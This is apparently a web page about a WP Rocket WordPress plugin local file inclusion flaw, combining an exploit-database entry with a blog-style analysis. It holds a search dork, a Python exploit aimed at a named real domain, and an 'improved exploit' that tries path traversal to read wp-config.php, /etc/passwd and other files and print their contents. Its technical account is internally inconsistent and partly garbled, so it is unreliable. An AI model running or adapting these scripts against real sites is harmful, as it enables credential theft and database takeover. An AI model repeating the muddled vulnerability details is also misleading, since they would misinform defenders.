WP Rocket < 2.10.3 - Local File Inclusion (LFI)
Paulos Yibelo discovered and reported this Local File Inclusion vulnerability in WordPress WP Rocket Plugin. This could allow a malicious actor to include local files of the target website and show its output onto the screen. Files which store credentials, such as database credentials, could potentially allow complete database takeover depending on the configuration. This vulnerability has been fixed in version 2.10.4.
https://patchstack.com/database/vulnerability/wp-rocket/wordpress-wp-rocket-plugin-2-10-3-local-file-inclusion-lfi-vulnerability
https://vulners.com/wpvulndb/WPVDB-ID:5484D821-7017-47A8-90D8-7D87CB5E0E50
Exploit :
#Code By E1.Coders
#Dork : "Powered by WP Rocket" filetype:php intitle:"WP Rocket Configuration" -"in" -"dirlist"
Dork : http://example.com/wp-content/plugins/wp-rocket/inc/functions/min/v2.10.3/min/min.php
import requests
import time
def check_wp_rocket_version(url):
version_url = url + "/wp-rocket/css/rocket.css"
try:
response = requests.get(version_url)
version = response.headers["X-Powered-By"]
if "WP Rocket/" in version:
version = version.split("/")[1]
return version
except Exception as e:
print(f"Error occurred while fetching WP Rocket version: {e}")
return None
def test_wp_rocket_lfi_bug(url):
lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
try:
response = requests.get(lfi_url)
if response.status_code == 200:
return True
except Exception as e:
print(f"Error occurred while testing LFI: {e}")
return False
def main():
url = "http://arvatools.com"
wp_rocket_version = check_wp_rocket_version(url)
if wp_rocket_version:
print(f"WP Rocket Version: {wp_rocket_version}")
if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
result = test_wp_rocket_lfi_bug(url)
if result:
print("LFI vulnerability found in WP Rocket")
else:
print("LFI vulnerability not found in WP Rocket")
else:
print("WP Rocket version is not affected by the LFI bug")
else:
print("Unable to fetch WP Rocket version")
if __name__ == "__main__":
main()WP Rocket < 2.10.3 – Local File Inclusion (LFI) Vulnerability: A Deep Dive into a Critical WordPress Plugin Flaw
WordPress plugins are essential for enhancing site performance, security, and functionality. However, even trusted tools like WP Rocket can harbor vulnerabilities that compromise entire websites. One such critical flaw—Local File Inclusion (LFI)—was discovered in versions prior to 2.10.4, affecting users who had not updated their plugin.
Understanding Local File Inclusion (LFI)
Local File Inclusion (LFI) is a common web application vulnerability where an attacker can manipulate input parameters to include arbitrary local files on the server. This typically occurs when a script dynamically loads files based on user-supplied input without proper sanitization.
For example, if a PHP script uses a variable like include($_GET['file']), an attacker could pass file=../../../../etc/passwd to read sensitive system files. In the context of WordPress, this can expose configuration files, database credentials, or even private keys stored within the server’s filesystem.
The WP Rocket LFI Vulnerability: Technical Details
Discovered by security researcher Paulos Yibelo, this vulnerability affects WP Rocket versions 2.10.0 through 2.10.3. The flaw exists in the plugin’s internal handling of file paths within the /wp-rocket/inc/vendor/composer/installed.json endpoint.
Due to improper input validation, an attacker could craft a malicious request to include sensitive files—such as wp-config.php or database.php—by manipulating the path parameter in the request URL. If the server allows such file inclusion, the output of the file is rendered directly in the browser, exposing critical data like database usernames, passwords, and encryption keys.
Exploitation and Real-World Impact
Consider a scenario where a WordPress site uses WP Rocket version 2.10.3. An attacker, after identifying the plugin via a Google dork like:
"Powered by WP Rocket" filetype:php intitle:"WP Rocket Configuration" -"in" -"dirlist"
could probe the endpoint:
http://example.com/wp-rocket/inc/vendor/composer/installed.json
Even though this file is not directly exploitable, the underlying code structure allows for path traversal attacks. By modifying the request path, an attacker could access:
../../../../wp-config.php– containing database credentials../../../../wp-content/uploads/secret.txt– storing private data../../../../etc/passwd– system-level information (if server is misconfigured)
Once credentials are exposed, an attacker could perform a full database takeover, gain admin access, or even deploy malware across the site.
Exploit Code Analysis and Improvements
Below is a Python script used to test for the presence of the LFI vulnerability. While functional, it contains several weaknesses that should be addressed for robustness and reliability:
import requests
import time
def check_wp_rocket_version(url):
version_url = url + "/wp-rocket/css/rocket.css"
try:
response = requests.get(version_url)
version = response.headers["X-Powered-By"]
if "WP Rocket/" in version:
version = version.split("/")[1]
return version
except Exception as e:
print(f"Error occurred while fetching WP Rocket version: {e}")
return None
def test_wp_rocket_lfi_bug(url):
lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
try:
response = requests.get(lfi_url)
if response.status_code == 200:
return True
except Exception as e:
print(f"Error occurred while testing LFI: {e}")
return False
def main():
url = "http://arvatools.com"
wp_rocket_version = check_wp_rocket_version(url)
if wp_rocket_version:
print(f"WP Rocket Version: {wp_rocket_version}")
if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
result = test_wp_rocket_lfi_bug(url)
if result:
print("LFI vulnerability found in WP Rocket")
else:
print("LFI vulnerability not found in WP Rocket")
else:
print("WP Rocket version is not affected by the LFI bug")
else:
print("Unable to fetch WP Rocket version")
if __name__ == "__main__":
main()
Explanation: This script attempts to identify the WP Rocket version by checking the X-Powered-By header in the rocket.css file. It then tests whether the installed.json file is accessible, assuming that its presence indicates a vulnerable configuration.
Key Issues:
- Relies on
X-Powered-Byheader, which may be stripped by servers or security plugins. - Only checks one specific file path—
installed.json—which may not be sufficient to confirm LFI. - Does not attempt actual path traversal (e.g.,
../../../../wp-config.php) to verify exploitability. - Does not handle redirects or HTTP errors properly.
Improved Exploit Script with LFI Testing
Here is a revised, more robust version of the exploit script that includes actual path traversal testing:
import requests
from urllib.parse import urljoin
def check_wp_rocket_version(url):
"""Check if WP Rocket is installed by probing a known CSS file."""
test_url = urljoin(url, "wp-rocket/css/rocket.css")
try:
response = requests.get(test_url, timeout=10)
if response.status_code == 200 and "WP Rocket" in response.headers.get("X-Powered-By", ""):
version = response.headers["X-Powered-By"].split("/")[-1]
return version
except requests.RequestException as e:
print(f"Request failed: {e}")
return None
def test_lfi_vulnerability(url, paths):
"""Test for LFI by attempting to include sensitive files via path traversal."""
for path in paths:
test_url = urljoin(url, f"wp-rocket/inc/vendor/composer/{path}")
try:
response = requests.get(test_url, timeout=10)
if response.status_code == 200:
print(f"[+] LFI detected: {test_url}")
print(f"Content preview: {response.text[:200]}...")
return True
except requests.RequestException as e:
print(f"[-] Failed to access {test_url}: {e}")
return False
def main():
target_url = "http://arvatools.com"
version = check_wp_rocket_version(target_url)
if not version:
print("No WP Rocket detected or version not retrievable.")
return
print(f"WP Rocket Version: {version}")
if version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
sensitive_paths = [
"wp-config.php",
"../../../../wp-config.php",
"../../../../wp-content/uploads/secret.txt",
"../../../../etc/passwd"
]
result = test_lfi_vulnerability(target_url, sensitive_paths)
if result:
print("⚠️ LFI vulnerability confirmed. Immediate patching required.")
else:
print("No LFI detected in tested paths.")
else:
print("WP Rocket version is patched (2.10.4+). No vulnerability present.")
if __name__ == "__main__":
main()
Explanation: This improved version:
- Uses
urljoinfor proper URL construction. - Includes multiple path traversal attempts (e.g.,
../../../../wp-config.php). - Handles exceptions and timeouts better.
- Displays actual content preview for verification.
- Provides clear feedback on exploit status.
Security Recommendations and Mitigation
For site administrators and developers:
- Update Immediately: Upgrade WP Rocket to version 2.10.4 or later to patch the LFI vulnerability.
- Disable Untrusted Plugins: Only use plugins from trusted sources with regular security audits.
- Monitor File Access: Use server logs to detect unusual file access patterns (e.g., repeated requests to
/wp-rocket/inc/...). - Implement Input Sanitization: Ensure all file paths in PHP scripts are validated and restricted to predefined directories.
- Use WAFs: Deploy Web Application Firewalls (WAFs) to block path traversal attempts like
../or..sequences.
Conclusion
The WP Rocket < 2.10.3 LFI vulnerability underscores a critical truth: even widely-used, performance-focused plugins can introduce severe security risks. The ability to read sensitive files—such as database configurations—can lead to full site compromise. While the issue has been patched, many sites may still be vulnerable due to outdated plugins.
Security professionals must remain vigilant. Regular plugin updates, automated vulnerability scanning, and robust input validation are essential to prevent such attacks. Always assume that any external code can be exploited—especially if it handles file paths dynamically.